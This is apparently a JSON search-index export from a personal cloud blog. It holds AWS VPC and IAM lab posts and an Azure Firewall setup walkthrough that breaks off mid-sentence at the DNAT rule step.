href=\"#enable-inter-vpc-connectivity-with-aws-transit-gateway\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/AWS Transit Gateway 1.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 2.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 3.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 4.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 5.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 6.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 7.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 8.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 9.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 10.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 11.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 12.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 13.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 14.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 15.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 16.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 17.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 18.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 19.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 20.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 21.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 22.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 23.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 24.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 25.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 26.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 27.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 28.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 29.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 30.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 31.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 32.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 33.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 34.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 35.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 36.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 37.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 38.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 39.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 40.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 41.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 42.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 43.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 44.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 45.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Transit Gateway 46.png\"\u003e","title":"Enable Inter Vpc Connectivity With Aws Transit Gateway"},{"content":"Enable Inter-VPC Connectivity Using Peering Connections in AWS # ","date":"April 3, 2023","permalink":"https://notesbynisha.com/posts/2023-04-03-enable-inter-vpc-connectivity-using-peering-connections-in-aws/","section":"Writing","summary":"\u003ch2 id=\"enable-inter-vpc-connectivity-using-peering-connections-in-aws\" class=\"relative group\"\u003eEnable Inter-VPC Connectivity Using Peering Connections in AWS \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#enable-inter-vpc-connectivity-using-peering-connections-in-aws\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n       \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/LlKjWDGWXdk?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n     \u003c/div\u003e\n\n\u003cimg src=\"/assets/images/AWS Peering 1.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 2.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 3.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 4.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 5.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 6.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 7.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 8.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 9.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 10.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 11.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 12.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 13.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 14.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 15.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 16.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 17.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 18.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 19.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 20.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 21.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 22.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 23.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 24.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 25.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 26.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 27.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 28.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 29.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 30.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 31.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 32.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 33.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 34.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 35.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 36.png\"\u003e\n\u003cimg src=\"/assets/images/AWS Peering 37.png\"\u003e","title":"Enable Inter Vpc Connectivity Using Peering Connections In Aws"},{"content":"AWS Networking: Multi-VPC Architecture # ","date":"March 29, 2023","permalink":"https://notesbynisha.com/posts/2023-03-29-aws-networking-multi-vpc-architecture/","section":"Writing","summary":"\u003ch2 id=\"aws-networking-multi-vpc-architecture\" class=\"relative group\"\u003eAWS Networking: Multi-VPC Architecture \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#aws-networking-multi-vpc-architecture\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/1 - Diagram.jpg\"\u003e\n\u003cimg src=\"/assets/images/2 - Create VPCs.png\"\u003e\n\u003cimg src=\"/assets/images/3 - VPCs.png\"\u003e\n\u003cimg src=\"/assets/images/4 - Subnets.png\"\u003e\n\u003cimg src=\"/assets/images/5 - total subnets.png\"\u003e\n\u003cimg src=\"/assets/images/6 - IGW.png\"\u003e\n\u003cimg src=\"/assets/images/7 - all IGWs.png\"\u003e\n\u003cimg src=\"/assets/images/8 - Route Tables.png\"\u003e\n\u003cimg src=\"/assets/images/9 - Edit Routes.png\"\u003e\n\u003cimg src=\"/assets/images/10 - new route tables.png\"\u003e\n\u003cimg src=\"/assets/images/11 - IAM Role.png\"\u003e\n\u003cimg src=\"/assets/images/12 - EC2 part 1.png\"\u003e\n\u003cimg src=\"/assets/images/13 - EC2 Network.png\"\u003e\n\u003cimg src=\"/assets/images/14 - EC2 IAM Profile.png\"\u003e\n\u003cimg src=\"/assets/images/15 - All EC2s.png\"\u003e\n\u003cimg src=\"/assets/images/16 - VPC A Pings fail.png\"\u003e\n\u003cimg src=\"/assets/images/17 - VPC B Pings fail.png\"\u003e\n\u003cimg src=\"/assets/images/18 - VPC C Pings fail.png\"\u003e","title":"Aws Networking Multi Vpc Architecture"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/access-control/","section":"Tags","summary":"","title":"Access Control"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/aws-security/","section":"Tags","summary":"","title":"AWS Security"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/iam/","section":"Tags","summary":"","title":"IAM"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/identity-management/","section":"Tags","summary":"","title":"Identity Management"},{"content":"Overview #In this lab, I explored how AWS Identity and Access Management (IAM) governs who can access specific AWS services and what actions they are allowed to perform. The lab walked through managing user identities, assigning permissions, and testing how IAM policies enforce least privilege across services like EC2 and S3.\nObjectives # Understand how IAM organizes users, groups, and policies Assign permissions according to a user’s job role Test how policies affect service access Observe the difference between managed and inline policies What is AWS IAM #AWS Identity and Access Management (IAM) is the core service that controls authentication and authorization within the AWS cloud. It allows you to create and manage users, assign them to groups, and apply permission policies that dictate what actions can be performed on AWS resources.\nIn short, IAM answers three key questions:\nWho can access AWS resources What actions they can perform Which resources they can perform those actions on Exploring Users and Groups #IAM uses a hierarchy that keeps access management organized. In this lab, I examined several pre-created users and groups representing different roles within a small organization.\nEach user had no permissions until added to a group. Groups, on the other hand, held the actual policies defining access levels. This structure showed how permissions can be managed collectively rather than individually.\nScreenshot suggestion:\nFigure 1. Pre-created IAM users (user-1, user-2, and user-3) displayed in the AWS Identity and Access Management console. Figure 2. The Permissions tab for user-1 showing no policies attached. The red warning indicates that this user currently has no access privileges. Figure 3. The Groups tab for user-1 confirming that this user is not yet a member of any IAM group. Figure 4. The Security Credentials tab for user-1 displaying console sign-in details and options to configure multi-factor authentication (MFA). IAM Console view of Users list showing user-1, user-2, and user-3. IAM Console view of User Groups showing EC2-Admin, EC2-Support, and S3-Support. Optional screen recording:\nShort clip demonstrating navigation between the Users and Groups pages in the IAM console. Understanding Policies #Policies in IAM are JSON-based documents that define permissions. They include three main elements:\nEffect – Allow or Deny Action – The AWS API calls that are permitted Resource – The specific resources those actions apply to By reviewing attached policies, I saw the difference between AWS managed policies, which are maintained by AWS and can be reused across environments, and inline policies, which are unique to a specific user or group.\nScreenshot suggestion:\nOpen AmazonEC2ReadOnlyAccess managed policy, showing its summary and permissions tab. Example of the JSON tab displaying policy structure. Figure 5. Pre-created IAM user groups: EC2-Admin, EC2-Support, and S3-Support. Each group is designed to manage permissions by functional role. Figure 6. The EC2-Support group includes the managed policy AmazonEC2ReadOnlyAccess, granting visibility into EC2 instances without modification rights. Figure 7. JSON policy document for AmazonEC2ReadOnlyAccess. This managed policy allows Describe and List operations across EC2, Load Balancing, CloudWatch, and Auto Scaling services. Figure 8. The S3-Support group uses the AWS managed policy AmazonS3ReadOnlyAccess, providing view-only access to S3 bucket contents. Figure 9. JSON policy for AmazonS3ReadOnlyAccess. The permissions include Get and List actions for all S3 buckets, ideal for support roles requiring non-destructive access. Figure 10. The EC2-Admin group contains a custom inline policy EC2-Admin-Policy rather than a managed policy. Inline policies are used for one-off or specialized permission sets. Figure 11. JSON definition of the EC2-Admin inline policy. It grants permission to start and stop EC2 instances while maintaining the ability to describe instances and alarms in CloudWatch. Assigning Users to Groups #Following a simple organizational model:\nThe S3 Support user needed read-only access to S3. The EC2 Support user required view-only access to EC2 instances. The EC2 Administrator needed the ability to start and stop EC2 instances. After adding each user to the correct group, their permissions took effect immediately. This demonstrated how IAM’s group model simplifies access management and enforces consistent security boundaries.\nScreenshot suggestion:\n“Add users to group” screen for one of the groups. Updated group summary showing one user assigned. Optional screen recording:\nA brief clip showing how a user is added to a group and confirmed. Figure 12. user-1 added to the S3-Support group, inheriting read-only permissions to Amazon S3 through the attached AmazonS3ReadOnlyAccess policy. Figure 13. user-2 added to the EC2-Support group, which provides view-only access to EC2 instances via the AmazonEC2ReadOnlyAccess managed policy. Figure 14. user-3 added to the EC2-Admin group. Members of this group are granted permissions defined by the inline EC2-Admin-Policy, allowing them to start and stop EC2 instances. Testing Access Permissions #Next, I logged in using the IAM user credentials to test their access.\nEach user account produced distinct outcomes that illustrated how policies enforce least privilege:\nUser 1 (S3 Support) – Could view S3 buckets but received “Access Denied” when opening EC2. User 2 (EC2 Support) – Could list EC2 instances but not stop or modify them. User 3 (EC2 Admin) – Could start and stop EC2 instances as expected. This verification step confirmed that IAM was correctly applying permissions as designed.\nScreenshot suggestion:\nAWS Management Console as each user: S3 bucket list (for S3 Support) EC2 instances view with “Access Denied” prompt (for EC2 Support) EC2 instance “Stopping” state (for EC2 Admin) Figure 15. IAM Dashboard displaying the account sign-in URL, which will be used for IAM user logins. Each user signs in through this unique console URL rather than the root account login page. Figure 16. IAM user-1 login screen using the account ID and IAM username. Logging in through a private browsing session prevents cached credentials from interfering with the test. Figure 17. user-1 successfully viewing available Amazon S3 buckets, confirming that membership in the S3-Support group grants read-only S3 access. Figure 18. user-2 receives an authorization error while attempting to describe EC2 instances. This confirms that the AmazonEC2ReadOnlyAccess policy is restricted by a higher-level control policy or region mismatch. Figure 19. user-3 verifying EC2 access through the EC2-Admin group. As an administrator, this user can start or stop instances according to the inline policy definition. Optional screen recording:\nShort demonstration switching between IAM sign-ins to show policy impact. Lessons Learned # Group-based permissions simplify scaling. Instead of editing each user, assign them to the right group. Managed policies save time. AWS updates them automatically to reflect new service actions. Always test IAM roles and permissions. Assumptions can lead to overly permissive access. Adopt least privilege by default. Grant only what is necessary for a user’s job function. Conclusion #This lab reinforced the importance of IAM as the foundation of AWS security. By defining identities, grouping them logically, and attaching precise permission policies, organizations can ensure accountability and limit exposure. Learning how these pieces fit together provides a strong baseline for securing larger environments and preparing for more advanced topics such as identity federation, role-based access, and policy automation.\nScreenshot suggestion (closing image):\nIAM Dashboard overview showing users, groups, and roles count summary — ideal as a closing graphic. ","date":"January 23, 2023","permalink":"https://notesbynisha.com/posts/2024-01-09-intro-aws-identity-and-access-management/","section":"Writing","summary":"A beginner-friendly walkthrough of managing users, groups, and permissions in AWS Identity and Access Management (IAM).","title":"Introduction to AWS Identity and Access Management (IAM)"},{"content":"How to Deploy a Secured Static Website on AWS # How to Deploy a Secured Static Website on AWS\n","date":"January 19, 2023","permalink":"https://notesbynisha.com/posts/2023-01-19-how-to-deploy-a-secured-static-website-on-aws/","section":"Writing","summary":"\u003ch2 id=\"how-to-deploy-a-secured-static-website-on-aws\" class=\"relative group\"\u003eHow to Deploy a Secured Static Website on AWS \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#how-to-deploy-a-secured-static-website-on-aws\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003ca href=\"https://eunishap.medium.com/how-to-deploy-a-secured-static-website-on-aws-37b381d47faa\"\u003e How to Deploy a Secured Static Website on AWS\u003c/a\u003e\u003c/p\u003e","title":"How To Deploy A Secured Static Website On Aws"},{"content":"Deploy an Amazon Connect Contact Center #++\n","date":"January 16, 2023","permalink":"https://notesbynisha.com/posts/2023-01-16-deploy-amazon-connect-contact-center/","section":"Writing","summary":"\u003ch2 id=\"deploy-an-amazon-connect-contact-center\" class=\"relative group\"\u003eDeploy an Amazon Connect Contact Center \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#deploy-an-amazon-connect-contact-center\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e++\u003c/p\u003e","title":"Deploy Amazon Connect Contact Center"},{"content":"Enable Session Stickiness Using an Application Load Balancer (ALB) in AWS #","date":"January 13, 2023","permalink":"https://notesbynisha.com/posts/2023-01-13-enable-session-stickiness-using-an-application-load-balancer-in-aws-alb/","section":"Writing","summary":"\u003ch2 id=\"enable-session-stickiness-using-an-application-load-balancer-alb-in-aws\" class=\"relative group\"\u003eEnable Session Stickiness Using an Application Load Balancer (ALB) in AWS \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#enable-session-stickiness-using-an-application-load-balancer-alb-in-aws\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Enable Session Stickiness Using An Application Load Balancer In Aws (Alb)"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/cloud/","section":"Tags","summary":"","title":"Cloud"},{"content":"Deploy and Configure Azure Firewall and Rules to Allow/Deny Access to Certain Websites # Fig.1 - Azure Premium Firewall Diagram | Image Source: Microsoft.com The Azure Firewall is a fully managed cloud-native service that provides network security to protect your Azure virtual network resources. The service offers built-in high availability, unrestricted scalability, threat intelligence-based filtering, logging and monitoring, and many more features and capabilities.\nAzure Firewall offers Layers 3–7 connectivity policies and is offered in three SKUs , for which throughput and enabled features depend on which SKU you deploy and is subject to different pricing: Standard , Premium, and Basic . It can be deployed on any virtual network, but is typically deployed on a central virtual network (VNet), such as a Hub-VNet where we peer other virtual networks to it in a Hub-and-Spoke model. It can also be integrated to use third-party security as a service (SECaaS) providers.\nUse Cases While there are many different use cases for using Azure Firewall for protection from incoming and outgoing threats by controlling and monitoring internal and external access to our networks, here are a few examples: Force tunneling all Internet-bound traffic to a designated next hop for inspection instead of going directly to the Internet To restrict and monitor traffic between partners and the SaaS platform Locking down outbound traffic from an App Service Environment Secure ingress and egress traffic between an Azure Kubernetes Service (AKS) cluster and external networks Filter network traffic between subnets (east-west) and application tiers (north-south) Detect and protect at deep levels through packet inspection Restrict outbound HTTP and HTTPS traffic based on the FQDN of the destination How does it work? Azure Firewall allows us to control and filter traffic through the use of configurable NAT rules, network rules, and application rules using either classic rules or Firewall Policy. Azure Firewall denies all traffic by default, until rules are manually configured to allow traffic. This demonstration will utilize a Firewall Policy for configuring rulesets, which will prioritize and process rules based on the hierarchy listed below by default.\nFig.2 - Firewall Ruleset Hierarchy | Image source: Microsoft.com. Fig.3 - Default Rule Collection Groups and their priority. You can read more about firewall rule processing logic on this Microsoft page .\nLab Demonstration In this demonstration, I will explain the steps for deploying an Azure Firewall in a subnet of a virtual network and creating firewall rules on a firewall policy by completing the following list of tasks: Set up a test network environment Deploy a firewall and firewall policy Create a default route Configure an application rule to allow access to www.google.com Configure a network rule to allow access to external DNS server Configure a Destination Network Address Translation (DNAT) rule to allow a remote desktop to the test server Test the firewall Fig.4 - Lab Diagram Task 1: Set up a test network environment a. Create a resource group In our first task, we need to create a Resource Group (RG) that will hold related resources for this deployment. In the top search bar, type in resource group and select it from the list of services, then click on + Create to begin the creation process of the resource group. On the Basics tab, we select our subscription, type in a name for the Resource Group, and then select our Region from the drop-down list. Here, I named my Resource Group Firewall-RG and selected East US as my deployment region. Click on Review + create to kick off the deployment of the RG.\nFig.5 Create a resource group b. Create a virtual network and subnets In the next task, we need to create a Virtual Network (VNet) with the subnet ranges that we will need taken from our VNet address space. In the top search bar, type in virtual network and select it from the list of services. Then, click on + Create to advance to the Virtual Network configuration page.\nOn the Basics tab, we select our Subscription, Resource group, and Region from the drop-down lists. For the Instance details, we provide a name for the Virtual Network. Then, click on Next: IP Addresses to advance to the next configuration tab.\nFig6. Create a virtual network — Basics On the IP Addresses configuration tab, we can modify the IPv4 address space for the virtual network. I went with a CIDR range of 10.0.0.0/16. Next, we need to configure the subnets that will be used on this VNet. Click on the “default” subnet below to open a pane on the right that will allow you to edit this pre-existing subnet. The first subnet that we will create is the “AzureFirewallSubnet”. The Azure Firewall (FW) requires a dedicated subnet with a CIDR of at least /26 to ensure that the firewall will have enough IP addresses available to accommodate any scaling. I provided the FW subnet of 10.0.1.0/26. Click on Save to accept the configuration of this subnet. Then, click on + Add subnet to create a new subnet.\nFig7. Create virtual network — Edit default subnet Fig8. Add “AzureFirewallSubnet” Next, we will add a subnet for the virtual machine that we will deploy into this subnet. Give the subnet a name and an address range. Here, I have entered a subnet address range of 10.0.2.0/24 and a subnet name of Workload-SN. Click on Add to add this subnet to the virtual network.\nFig9. Add Virtual Machine Subnet — Workload-SN Next, we can confirm and verify the IP Addresses configuration that we wish to deploy and click on Review + create to kick off the deployment of this Virtual Network if we do not wish to add any additional configuration to it.\nFig10. Verify configured IP Addresses configuration c. Create a virtual machine\nWith our virtual networks deployed and ready, we can now move on to the deployment of the workload virtual machine that will reside on the subnet that was just created. In this step, I used an ARM Template to expedite the deployment of the virtual machine by uploading the template and parameters files to a CloudShell storage on the Azure portal. I then initiated the deployment by assigning the $RGName variable with the name of my RG, Firewall-RG, and then proceeded with the New-AzResourceGroupDeloyment cmdlet.\n$RGName = \u0026ldquo;Firewall-RG\u0026rdquo;\nNew-AzResourceGroupDeployment -ResourceGroupName $RGName -TemplateFile firewall.json -TemplateParameterFile firewall.parameters.json\nFig11. Deploy Virtual Machine on CloudShell using an ARM Template Upon completion of the VM deployment on the Cloudshell, I searched the top bar for virtual machines and clicked on my VM, Srv-Work to verify its assigned IP address, 10.0.2.4.\nFig12. Verify Virtual Machine Deployment Task 2: Deploy the firewall and firewall policy With our virtual networks, subnets, and virtual machines now deployed, we are now ready to deploy the Azure Firewall into the virtual network with a firewall policy configured. In the top search bar, type in firewall and select it from the list of services. Then, click on + Create.\nFig13. Search for firewall in services list Search for firewall in the services list In the next step, we will provide the information needed to create a firewall for this deployment. To begin, we select our subscription, Resource Group, Region, Availability Zone information, and a name for the firewall instance. Here, I have entered the name of Firewall-01 for this FW, selected a Standard Firewall SKU, and selected the option to use a Firewall policy.\nNext, we need to create a new Firewall Policy by clicking on “Add new” and then entering a name, Region, and Policy tier for the FW. Here, I named the policy “fw-pol”, selected the East US Region since this is where my resources have been deployed to and selected a Standard Policy tier.\nFinally, we can choose to create a new virtual network for the firewall or choose an existing VNet where it should be deployed to. Here, I selected the FW-VNet that was deployed earlier and created a new Public IP address for the firewall, naming it fw-pip. Forced Tunneling mode is a configurable option that is available for the firewall in the event that we need to force outbound Internet-destined traffic to an on-premises site for inspection prior to routing it to the Internet. While this option will be used in a future demonstration, it was not enabled for this deployment. Next, click Review + create to kick off the firewall deployment process. This process can take up to 30 minutes to complete.\nFig14. Create a firewall With the firewall deployment completed, I then clicked on “Go to Resource” to review some details about the firewall that will be needed for configuring routes on our next task. On the Overview tab, I noted that the private IP address assigned to the firewall was 10.0.1.4.\nFig15. Verify Firewall Private IP Address Next, I clicked on the name of the firewall’s Public IP to verify the assigned Public IP address, which was 20.228.240.135. This public IP address will be needed for initiating our RDP connection to the firewall from our PC during testing in a later step.\nFig16. Verify Firewall Public IP Address Task 5: Create a default route Our next task involves configuring a Route Table that will be used to store a custom route (User-Defined Route) that we need to configure for the Workload subnet. To create the Route Table, search for route table in the top search bar, select it from the list of services, then click on + Create. Here, we choose our Subscription, Resource Group, Region, and enter a name for the Route table. Next, I gave the instance the name of Firewall-route. Propagation of gateway routes option should be enabled if you plan to associate the route table to a subnet in a VNet that is connected to your on-premises network through a VPN Gateway and you want to propagate your on-premises routes to the network interfaces in the subnet. I could have disabled this option on this step because this is not needed since there is no VPN Gateway included as part of this deployment. Click on Review + Create to begin the deployment of the Route table.\nFig17. Create a Route Table Now, creating a Route Table alone is useless without associating it to a subnet and adding custom routes to it. So in this next step, we will associate the new Route Table to our Workload subnet by searching for the Route Table in the top search bar, then select Route table from the list of services, then clicking on our configured route table to open it.\nOn the Subnets menu listed under Settings, click on + Associate to display the configuration pane that opens on the right. Here, we will select the Virtual network that we want to associate this route table with, FW-VNet. Then, select the Workload-SN for the next field entry for the subnet. Click on OK to accept this configuration\nFig18. Associate Route Table with Workload-SN Subnet Fig19. Verification of Route Table and Workload-SN Subnet Association Task 3: Create a Default Route On the Workload-SN subnet that is associated with this route table, we want to configure the default route to redirect outbound traffic to go through the firewall rather than allowing it to route directly out to the Internet. By doing so, we can ensure that the firewall rules that are configured within our firewall policy are applied to the traffic before making a decision to allow or deny the flow. We can configure this custom route by navigating to “Routes” under the settings section of the menu and then click on + Add to open the Add route configuration pane.\nFig20. Add Route to Route Table On the Add route configuration pane, we need to supply a name for the route (fw-dg) and an Address prefix destination. Here we must select an Address prefix destination of either IP Address or Service Tag. We will select IP Addresses for this option since we have a specific Destination IP address that we want to enter in CIDR notation for the default route of 0.0.0.0/0. Next, select the Next hop type from the drop-down list and select Virtual Appliance since we want all outbound Internet-destined traffic to be redirected to the firewall. Finally, we will enter the private IP address of the firewall as the Next hop address, 10.0.1.4. Click on Add to add this entry to the route table. The purpose of this custom user-defined route (UDR) entry is to override the System Default Route for this address prefix that is currently set to route all outbound traffic directly to the Internet.\nFig21. Add route Fig22. Verification of Default Route Added to Route Table Let\u0026rsquo;s take a quick glance at the Effective Routes for the network interface of the workload server VM. We observe that the newly created UDR has now overwritten the System Default route that previously routed outbound traffic to the Internet. The Default route now shows a state of “Invalid” and the UDR is now the active route for the 0.0.0.0/0 address prefix. This is the expected behavior that we are trying to achieve such that outbound traffic will now be redirected to the firewall first to determine whether or not the Internet-destined traffic request will be allowed or denied after the evaluation of the configured firewall rules, which we will create in the next task.\nFig23. Effective Routes for the Workload subnet Task 4: Configure an application rule to allow access to www.google.com With the default outbound route now in place, it is now time for us to add firewall rules to our firewall policy to provide the desired action on the traffic received by the firewall. From the main menu, we can click on All resources and click on fw-pol to open the Firewall Policy resource.\nFig24. Select the Firewall Policy Resource The first type of rule that we will add is an application rule. For this task, we will add an application rule that allows outbound access to www.google.com. Under Settings, click Application Rules. Then click on the + Add a rule collection to begin the creation of a new collection where we can enter rules.\nFig25. Add a New Rule Collection for the Application Rules We need to enter some information for the new rule collection. Here, we will enter the following values:\nName: AppRule-Coll01 Rule Collection type: Application Priority: 200 Rule collection action: Allow Rule collection group: DefaultApplicationRuleCollectionGroupRule Next, we will enter the values for the new Application rule as follows:\nName: Allow-Google Source type: IP Address Protocol: http, https Destination Type: FQDN Destination: www.google.com Click on “Add” to add this new Rule Collection and Rule to the firewall policy\nFig26. Add a Rule Collection and Rule Fig27. Verification of added rule collection and rule Task 5: Configure a network rule to allow access to external DNS servers Now, we will configure a network rule that allows our subnet to have outbound access to two IP addresses at port 53 (DNS). This is needed so that any traffic that our firewall receives that is sourced from our workload subnet (10.0.2.0/24) will have access to communicate outbound with the two public DNS servers (Century Link DNS) for Public DNS name resolution. These DNS server IP addresses are 209.244.0.3 and 209.244.0.4.\nWhile on the firewall policy resource page, click on Network rules located under Settings on the menu and then click on + Add a new rule collection.\nFig28. Add a New Rule Collection for the Network Rules On the Add a rule collection window, we will enter the following values to configure this collection and network rule:\nName: NatRule-Coll01 Rule collection type: Network Priority: 200 Rule collection action: Allow Rule collection group: DefaultNetworkRuleCollectionGroup Next, we will enter the values for the new Network rule as follows:\nName: Allow-DNS Source type: IP address Source: 10.0.2.0/24 Protocol: UDP Destination Ports: 53 Destination Type: IP Address Destination: 209.244.0.3, 209.244.0.4\nFig29. Add a Rule Collection and Network Rule Fig30. Verification of Configured Network Rule Task 6: Configure a NAT rule to allow a remote desktop connection to the test server In this task, we will add a DNAT rule that will allow us to connect a remote desktop to the Srv-Work virtual machine through the firewall. We will begin by creating a new rule collection for our DNAT rules. While on our Firewall Policy resource page, click on DNAT rules located under the Settings section and then click on + Add a rule collection.\nFig31. Add a Rule Collection for DNAT rules Next, we will enter values for our rule collection for DNAT as follows:\nName: rdp Rule collection type: DNAT Priority: 200 Rule collection group: DefaultDnatRuleCollectionGroup\nFig32. Add Rule Collection and Rule for Destination Network Address Translation (DNAT) In the rules section, we need to enter values that will allow an inbound remote desktop connection to the workload server from any source IP address by going through the firewall.\nWe will enter the following values listed below for the Destination Network Address Translation (DNAT) rule to accomplish this such that any RDP connection made from any source IP address to the firewall’s public IP address (to port 3389) will translate to the private IP address of the workload server VM. That’s right! We want the destination IP address to be translated to the IP Address of the workload server VM so that we can connect to it through a remote desktop connection from another device.\nName: 